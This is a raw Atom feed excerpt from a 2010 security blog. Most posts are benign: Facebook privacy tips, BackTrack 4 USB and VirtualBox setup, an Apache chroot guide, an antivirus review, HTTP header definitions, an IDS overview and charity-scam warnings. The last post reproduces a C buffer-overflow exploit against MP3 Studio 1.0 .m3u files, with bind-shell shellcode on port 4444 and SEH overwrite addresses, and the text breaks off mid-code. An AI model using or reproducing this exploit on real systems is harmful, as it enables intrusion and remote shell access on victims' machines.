touch with other people? Share links and updates the activity? Ask yourself what you want to obtain a personal profile. Thus, cut will be more personal information that is publish&lt;br /&gt;&lt;a href="http://www.thatcoin.com/2010/08/using-facebook-secure/"&gt;Source and read the complete article&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-6399265336842477310?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6399265336842477310'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6399265336842477310'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/08/using-facebook-tips.html' title='Using Facebook Tips'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1869888920378448439</id><published>2010-08-11T22:54:00.002+07:00</published><updated>2010-08-11T22:54:54.237+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Saving Password into DataInherit</title><content type='html'>As many 50 passwords and some important documents you can store the data into DataInherit online services. A Free service that combines online stroge and data privacy gives allocation of file storage for 10 mb. Another advantage, through the iPhone, you can also access an account that has been made.&lt;br /&gt;&lt;a href="http://www.thatcoin.com/2010/08/save-your-password/"&gt;Source&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1869888920378448439?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1869888920378448439'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1869888920378448439'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/08/saving-password-into-datainherit.html' title='Saving Password into DataInherit'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3252053663648422380</id><published>2010-04-09T21:29:00.000+07:00</published><updated>2010-04-09T21:29:34.629+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OS'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Bootable BT4 USB stick</title><content type='html'>If you want to have Back Track 4 on USB with persistent changes and want to make it bootable USB with linux just follow the instructions in the article How To: “&lt;a href="http://www.digit-8.com/tutorials/make-bootable-usb-to-save-changes-bt3-on-usb-with-persistent-changes" target="_blank"&gt;Make bootable USB to save changes – Back Track 3 on USB with persistent changes&lt;/a&gt;“. The instructions are the same for BT4. (By the way, this post is written for my personal use with a help I found somewhere online, I post it here to show my hardware compatability).&lt;br /&gt;To make BT4 bootable with persistent changes I used 2 USB sticks. The first to launch Back Track (BT2,3 or4) without any changes and the second to prepare and make all changes in linux for my Back Track 4. I used 2 USB sticks because it is easier.&lt;br /&gt;Well, when you finish Step 5 you will need to follow the instructions below:&lt;br /&gt;Let’s say we have a formatted second partition, mount it and create a changes directory in the root of the file system. Open shell and execute these commands:&lt;br /&gt;mount /dev/sdc2 /mnt/sdc2&lt;br /&gt;cd /mnt/sdc2&lt;br /&gt;mkdir changes&lt;br /&gt;Don’t forget that it can be sdc2 but not sdb2. It depends on your computer and configurations. If you use 2 USB sticks there should be sdc2. next we will make some changes to how the system boots. Now execute these commands:&lt;br /&gt;cd /boot/syslinux&lt;br /&gt;chmod +Xx lilo&lt;br /&gt;chmod +Xx syslinux&lt;br /&gt;Then you need to open syslinux.cfg and modify it. To do that execute the commands:&lt;br /&gt;cd /mnt/sdc1/boot/syslinux&lt;br /&gt;kwrite syslinux.cfg&lt;br /&gt;I copied the boot definition I wanted to change and created a new entry so I would have a fall back option if something became broken. well, in the file find:&lt;br /&gt;1. “LABEL BT4″&lt;br /&gt;2. Copy this line and next 3 lines and paste all these lines below existing 4 lines. Well, now we have the same 4 lines. Our new section.&lt;br /&gt;3. Change the “LABEL BT4″ to something you want like “LABEL BT4-persistent” and description to something like “MENU LABEL BT4 Beta – Console – Persistent”.&lt;br /&gt;4. Now we need to change the line that begins with APPEND in your copied section by adding “changes=/dev/sdx2″ immediately after “root=/dev/ram0 rw” where the x is the drive appropriate for your system. In my case it looks like this, “….root=/dev/ram0 rw changes=/dev/sdc2….”. Remember that you need to add “changes=/dev/sdx2″ after “rw” and remove the last word that goes after “rw”. I think there should be “quite” or something similar at the end of the line. Just delete this word.&lt;br /&gt;5. Save your changes and exit the editor.&lt;br /&gt;That should work fine now. Reboot and select the option you setup configured. To test it, create a file and reboot again. If your file is still there, everything is perfect. If you follow all instruction step by step you won’t have any errors.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://digit-8.com" target="_blank"&gt;Source&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3252053663648422380?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3252053663648422380'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3252053663648422380'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/04/bootable-bt4-usb-stick.html' title='Bootable BT4 USB stick'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-6852858137971785701</id><published>2010-04-09T21:25:00.002+07:00</published><updated>2010-04-09T21:25:34.282+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutorial'/><title type='text'>Chrooting Apache2 With mod_chroot On Fedora 12</title><content type='html'>This guide explains how to set up mod_chroot with Apache2 on a Fedora 12 system. With mod_chroot, you can run Apache2 in a secure chroot environment and make your server less vulnerable to break-in attempts that try to exploit vulnerabilities in Apache2 or your installed web applications. I do not issue any guarantee that this will work for you!&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Preliminary Note&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;I'm assuming that you have a running Fedora 12 system with a working Apache2, e.g. as shown in this tutorial: The Perfect Server - Fedora 12 x86_64 [ISPConfig 2]. In addition to that I assume that you have one or more web sites set up within the /var/www directory (e.g. if you use ISPConfig).&lt;br /&gt;&lt;br /&gt;&lt;a href="http://howtoforge.com/chrooting-apache2-with-mod_chroot-on-fedora-12" target="_blank"&gt;Source and read this full article at HowToForge&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-6852858137971785701?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6852858137971785701'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6852858137971785701'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/04/chrooting-apache2-with-modchroot-on.html' title='Chrooting Apache2 With mod_chroot On Fedora 12'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3699264777339097685</id><published>2010-03-16T19:39:00.000+07:00</published><updated>2010-03-16T19:39:01.173+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OS'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Using BT4 On VirtualBox</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&amp;nbsp;&lt;a href="http://2.bp.blogspot.com/_Ltm3Etcp4Hw/S597nG3cdpI/AAAAAAAAABc/wOimcDMqaXU/s1600-h/backtrack_4_logo_pre_final.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_Ltm3Etcp4Hw/S597nG3cdpI/AAAAAAAAABc/wOimcDMqaXU/s320/backtrack_4_logo_pre_final.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;Just some quick installation notes for those looking wanting to install the recent &lt;a href="http://virtualbox.org/" target="_blank"&gt;Virtualbox&lt;/a&gt; release (3.0.4) for &lt;a href="http://www.remote-exploit.org/backtrack_download.html/" target="_blank"&gt;Backtrack 4&lt;/a&gt;. In case you don't know yet - BT4 is the most top rated linux live distribution focused on penetration testing. The new &lt;a href="http://debian.org/" target="_blank"&gt;Debian&lt;/a&gt; core (Ubuntu 8.10) makes Backtrack 4 easily extendable.&lt;br /&gt;&lt;br /&gt;I'm a huge fan of Backtrack and use it as primary Operating System (HD Installation) on one of my laptops, currently studying for the Offensive Security course "Penetration Testing with BackTrack".&lt;br /&gt;&lt;br /&gt;If you are looking for some pointers to get BT4 persistent changes without HD installation, @kriggins "Backtrack 4 USB persistent changes Nessus HowTo" is highly recommended.&lt;br /&gt;&lt;br /&gt;Installation&lt;br /&gt;&lt;br /&gt;Add the following line to your /etc/apt/sources.list:&lt;br /&gt;&lt;br /&gt;deb http://download.virtualbox.org/virtualbox/debian intrepid non-free&lt;br /&gt;Add the following key to your keyring (verify!):&lt;br /&gt;&lt;br /&gt;# wget -q http://download.virtualbox.org/virtualbox/debian/sun_vbox.asc -O- | sudo apt-key add -&lt;br /&gt;Update your package cache&lt;br /&gt;&lt;br /&gt;# apt-get update&lt;br /&gt;Install Virtualbox packages&lt;br /&gt;&lt;br /&gt;# apt-get install virtualbox-3.0&lt;br /&gt;answer the prompt "Should the vboxdrv kernel module be compiled now?" with "Yes"&lt;br /&gt;&lt;br /&gt;If it fails, have a look at /var/log/vbox-install.log and re-run /etc/init.d/vboxdrv setup after fixing the problem (usually missing header files, compiler, etc.)&lt;br /&gt;&lt;br /&gt;start via "/usr/bin/VirtualBox" (case-sensitive!)&lt;br /&gt;Virtualbox is now ready, have fun!&lt;br /&gt;&lt;br /&gt;Note: &lt;br /&gt;Thanks to dkms, the VirtualBox host kernel modules (vboxdrv,&lt;br /&gt;vboxnetflt and vboxnetadp) will be updated automatically if the linux kernel&lt;br /&gt;version changes during the next apt-get upgrade.&lt;br /&gt;&lt;br /&gt;source &lt;a href="http://marsmenschen.com/" target="_blank"&gt;marsmenschen.com&lt;/a&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3699264777339097685?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3699264777339097685'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3699264777339097685'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/03/using-bt4-on-virtualbox.html' title='Using BT4 On VirtualBox'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Ltm3Etcp4Hw/S597nG3cdpI/AAAAAAAAABc/wOimcDMqaXU/s72-c/backtrack_4_logo_pre_final.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3373083832121393639</id><published>2010-03-16T19:32:00.001+07:00</published><updated>2010-03-16T19:33:49.675+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Anti Virus'/><title type='text'>Kaspersky Internet Security 2010 Improved Features</title><content type='html'>In the areas where it really counts, Kaspersky Internet Security 2010 does a fantastic job at detecting, preventing, and eliminating viruses, spyware, adware, and other malicious software. &lt;br /&gt;&lt;br /&gt;We like Kaspersky a lot, and they've consistently been one of the best, most innovative antivirus security software vendor for many years. &lt;br /&gt;&lt;br /&gt;Our testing showed excellent results in all areas of security protection with only a couple of areas that could use further revision. &lt;br /&gt;&lt;br /&gt;Overall, Kaspersky delivers excellent virus and malware protection, but only average anti-phishing and parental controls, and a less-than-perfect firewall. &lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;b&gt;IMPROVED FEATURES &lt;br /&gt;•  Great Antivirus Protection &lt;br /&gt;•  Better Spyware Protection &lt;br /&gt;•  Solid Real-time Coverage &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Every year brings significant progress from Kaspersky; we hope they'll improve some of their deficiencies this year (and lower the price.) Regardless though, Kaspersky is a terrific Internet Security suite for anyone. &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3373083832121393639?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3373083832121393639'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3373083832121393639'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/03/kaspersky-internet-security-2010.html' title='Kaspersky Internet Security 2010 Improved Features'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1258660693539144027</id><published>2010-03-01T19:45:00.001+07:00</published><updated>2010-03-01T19:45:51.571+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutorial'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>HTTP Header 1.1</title><content type='html'>Header Field Definitions&lt;br /&gt;This section defines the syntax and semantics of all standard HTTP/1.1 header fields. For entity-header fields, both sender and recipient refer to either the client or the server, depending on who sends and who receives the entity. &lt;br /&gt;Accept&lt;br /&gt;&lt;br /&gt;The Accept request-header field can be used to specify certain media types which are acceptable for the response. Accept headers can be used to indicate that the request is specifically limited to a small set of desired types, as in the case of a request for an in-line image. &lt;br /&gt;&lt;br /&gt;Accept         = "Accept" ":"&lt;br /&gt;#( media-range [ accept-params ] )&lt;br /&gt;media-range    = ( "*/*"&lt;br /&gt;| ( type "/" "*" )&lt;br /&gt;| ( type "/" subtype )&lt;br /&gt;) *( ";" parameter )&lt;br /&gt;accept-params  = ";" "q" "=" qvalue *( accept-extension )&lt;br /&gt;accept-extension = ";" token [ "=" ( token | quoted-string ) ]&lt;br /&gt;&lt;br /&gt;The asterisk "*" character is used to group media types into ranges, with "*/*" indicating all media types and "type/*" indicating all subtypes of that type. The media-range MAY include media type parameters that are applicable to that range. &lt;br /&gt;Each media-range MAY be followed by one or more accept-params, beginning with the "q" parameter for indicating a relative quality factor. The first "q" parameter (if any) separates the media-range parameter(s) from the accept-params. Quality factors allow the user or user agent to indicate the relative degree of preference for that media-range, using the qvalue scale from 0 to 1. The default value is q=1. &lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;i&gt;Note: Use of the "q" parameter name to separate media type&lt;br /&gt;parameters from Accept extension parameters is due to historical&lt;br /&gt;practice. Although this prevents any media type parameter named&lt;br /&gt;"q" from being used with a media range, such an event is believed&lt;br /&gt;to be unlikely given the lack of any "q" parameters in the IANA&lt;br /&gt;media type registry and the rare usage of any media type&lt;br /&gt;parameters in Accept. Future media types are discouraged from&lt;br /&gt;registering any parameter named "q". &lt;/i&gt;&lt;/blockquote&gt;&lt;br /&gt;The example &lt;br /&gt;&lt;br /&gt;Accept: audio/*; q=0.2, audio/basic&lt;br /&gt;&lt;br /&gt;SHOULD be interpreted as "I prefer audio/basic, but send me any audio type if it is the best available after an 80% mark-down in quality." &lt;br /&gt;If no Accept header field is present, then it is assumed that the client accepts all media types. If an Accept header field is present, and if the server cannot send a response which is acceptable according to the combined Accept field value, then the server SHOULD send a 406 (not acceptable) response. &lt;br /&gt;A more elaborate example is &lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Accept: text/plain; q=0.5, text/html,&lt;br /&gt;text/x-dvi; q=0.8, text/x-c&lt;br /&gt;&lt;br /&gt;Verbally, this would be interpreted as "text/html and text/x-c are the preferred media types, but if they do not exist, then send the text/x-dvi entity, and if that does not exist, send the text/plain entity." &lt;br /&gt;Media ranges can be overridden by more specific media ranges or specific media types. If more than one media range applies to a given type, the most specific reference has precedence. For example, &lt;br /&gt;&lt;br /&gt;Accept: text/*, text/html, text/html;level=1, */*&lt;br /&gt;&lt;br /&gt;have the following precedence: &lt;br /&gt;&lt;br /&gt;1) text/html;level=1&lt;br /&gt;2) text/html&lt;br /&gt;3) text/*&lt;br /&gt;4) */*&lt;br /&gt;&lt;br /&gt;The media type quality factor associated with a given type is determined by finding the media range with the highest precedence which matches that type. For example, &lt;br /&gt;&lt;br /&gt;Accept: text/*;q=0.3, text/html;q=0.7, text/html;level=1,&lt;br /&gt;text/html;level=2;q=0.4, */*;q=0.5&lt;br /&gt;&lt;br /&gt;would cause the following values to be associated: &lt;br /&gt;&lt;br /&gt;text/html;level=1         = 1&lt;br /&gt;text/html                 = 0.7&lt;br /&gt;text/plain                = 0.3&lt;br /&gt;image/jpeg                = 0.5&lt;br /&gt;text/html;level=2         = 0.4&lt;br /&gt;text/html;level=3         = 0.7&lt;br /&gt;&lt;br /&gt;Note: A user agent might be provided with a default set of quality&lt;br /&gt;values for certain media ranges. However, unless the user agent is&lt;br /&gt;a closed system which cannot interact with other rendering agents,&lt;br /&gt;this default set ought to be configurable by the user.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html" target="_blank"&gt;Source and keep reading&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Download via &lt;a href="http://www.ziddu.com/download/8772198/rfc2616-httpheader1.1.zip.html"&gt;Ziddu&lt;/a&gt; &lt;a href="http://www.dontellanyone.cz.cc/mirror/rfc2616 - http header 1.1.zip"&gt;Mirror&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1258660693539144027?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1258660693539144027'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1258660693539144027'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/03/http-header-11.html' title='HTTP Header 1.1'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-9105272577602278232</id><published>2010-03-01T19:40:00.000+07:00</published><updated>2010-03-01T19:40:15.158+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutorial'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Intrusion Detection System Tutorial</title><content type='html'>An intrusion detection system (IDS) is a device (or application) that monitors network and/or system activities for malicious activities or policy violations.&lt;br /&gt;Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents, which are violations or imminent threats of violation of computer security policies, acceptable use policies, or standard security practices. Intrusion prevention is the process of performing intrusion detection and attempting to stop detected possible incidents. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators. In addition, organizations use IDPSs for other purposes, such as identifying problems with security policies, documenting existing threats, and deterring individuals from violating security policies. IDPSs have become a necessary addition to the security infrastructure of nearly every organization.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;IDPSs typically record information related to observed events, notify security administrators of important observed events, and produce reports. Many IDPSs can also respond to a detected threat by attempting to prevent it from succeeding.They use several response techniques, which involve the IDPS stopping the attack itself, changing the security environment (e.g., reconfiguring a firewall), or changing the attack’s content.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://en.wikipedia.org" target="_blank"&gt;Source&lt;/a&gt; &lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-9105272577602278232?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/9105272577602278232'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/9105272577602278232'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/03/intrusion-detection-system-tutorial.html' title='Intrusion Detection System Tutorial'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-6310934797991309285</id><published>2010-02-14T19:11:00.000+07:00</published><updated>2010-02-14T19:11:30.492+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Haiti World Earthquake Virtual Worlds</title><content type='html'>Haiti recently hit by powerful earthquake. Haiti beaten by 7 earthquake richter scale. The impact of the earthquake is very sad. Victims of the earthquake was not a bit. An estimated 75 thousand people buried in rubble and about 200 thousand people were killed by the earthquake. Assistance from all over the world came. Donations through the virtual world is emerging. It turned out to have been exploited by online criminals. &lt;br /&gt;&lt;br /&gt;Online criminals deceive via email and fake websites designed to steal what should be a charitable donation. Symantec has seen online scams spread with themes including Haiti earthquake spam email asking for donations and manipulate search results that can infect computers with malware. &lt;br /&gt;&lt;br /&gt;Symantec security experts called on computer users to follow the smart ways to be safe online, and ensure that your donations and assistance to disaster victims and not to con men. &lt;br /&gt;&lt;br /&gt;When contributing to a charity online, always remember: &lt;br /&gt;&lt;br /&gt;Avoid clicking on suspicious links in emails or IM messages because it may be a link to a fake website. Symantec security experts recommend to type the Web address, such as the Web address charitable organizations, directly into the browser instead of clicking the link in the message. &lt;br /&gt;&lt;br /&gt;Do not ever fill out a form in a message requesting personal information, financial or password. A charitable organization has a reputation can not be asked for personal information via e-mail. If you are in doubt, contact the organizations directly concerned by a trusted independent mechanism, such as phone numbers have been verified, or Internet address that you enter into a new browser menu (do not click on or cut and paste the link in the message).&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-6310934797991309285?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6310934797991309285'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6310934797991309285'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/02/haiti-world-earthquake-virtual-worlds.html' title='Haiti World Earthquake Virtual Worlds'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1324045893796678773</id><published>2010-02-14T19:10:00.000+07:00</published><updated>2010-02-14T19:10:17.487+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploit'/><title type='text'>MP3 Studio 1.0 (.m3u File) Local Buffer Overflow Exploit</title><content type='html'>/* mplode.c vs MP3 Studio v1.0&lt;br /&gt; * Tested on: Windows 2000 SP4&lt;br /&gt; *&lt;br /&gt; * Author: Dominic Chell &lt;dmc@deadbeef.co.uk&gt;&lt;br /&gt; *&lt;br /&gt; * PoC: http://www.milw0rm.com/exploits/9277&lt;br /&gt; * The PoC author said he could not exploit it so I decided to try.&lt;br /&gt; *&lt;br /&gt; * A bit of fun for a boring night in Peterborough :(&lt;br /&gt; * Good luck finding someone who uses this media player.&lt;br /&gt; */&lt;br /&gt;&lt;br /&gt;#include "stdafx.h"&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;errno.h&gt;&lt;br /&gt;#include &lt;string.h&gt;&lt;br /&gt;&lt;br /&gt;#define usage(){ (void)fprintf(stderr, "MPlode vs MP3 Studio v1.0\n(C) dmc &lt;dmc@deadbeef.co.uk&gt;\n\nExample: mplode.exe [output file]\n");}&lt;br /&gt;#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}&lt;br /&gt;&lt;br /&gt;// bind shell lport = 4444&lt;br /&gt;char shellcode[] =&lt;br /&gt; "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7"&lt;br /&gt; "\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f"&lt;br /&gt; "\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b"&lt;br /&gt; "\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19"&lt;br /&gt; "\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8"&lt;br /&gt; "\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b"&lt;br /&gt; "\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b"&lt;br /&gt; "\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0"&lt;br /&gt; "\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50"&lt;br /&gt; "\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82"&lt;br /&gt; "\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3"&lt;br /&gt; "\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61"&lt;br /&gt; "\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8"&lt;br /&gt; "\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9"&lt;br /&gt; "\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7"&lt;br /&gt; "\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0"&lt;br /&gt; "\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad"&lt;br /&gt; "\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f"&lt;br /&gt; "\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1"&lt;br /&gt; "\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50"&lt;br /&gt; "\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf"&lt;br /&gt; "\xa4\x7d\x2e\x7f\x27\x82\xf8\x80";&lt;br /&gt;&lt;br /&gt;char *seh = "\xC4\x2A\x02\x75";&lt;br /&gt;//ws2help.dll - 0x75022AC4 - pop/pop/ret&lt;br /&gt;char *nextseh = "\xeb\x10\x90\x90";&lt;br /&gt;// short jmp nop nop&lt;br /&gt;&lt;br /&gt;int main(int argc, char *argv[])&lt;br /&gt;{&lt;br /&gt; char outfile[20];&lt;br /&gt; if(argc &lt; 2) {  usage();  return 0; } if(strlen(argv[1])&lt;15) {  strncpy(outfile, argv[1], 14);  outfile[14] = '\0'; } else strcpy(outfile, 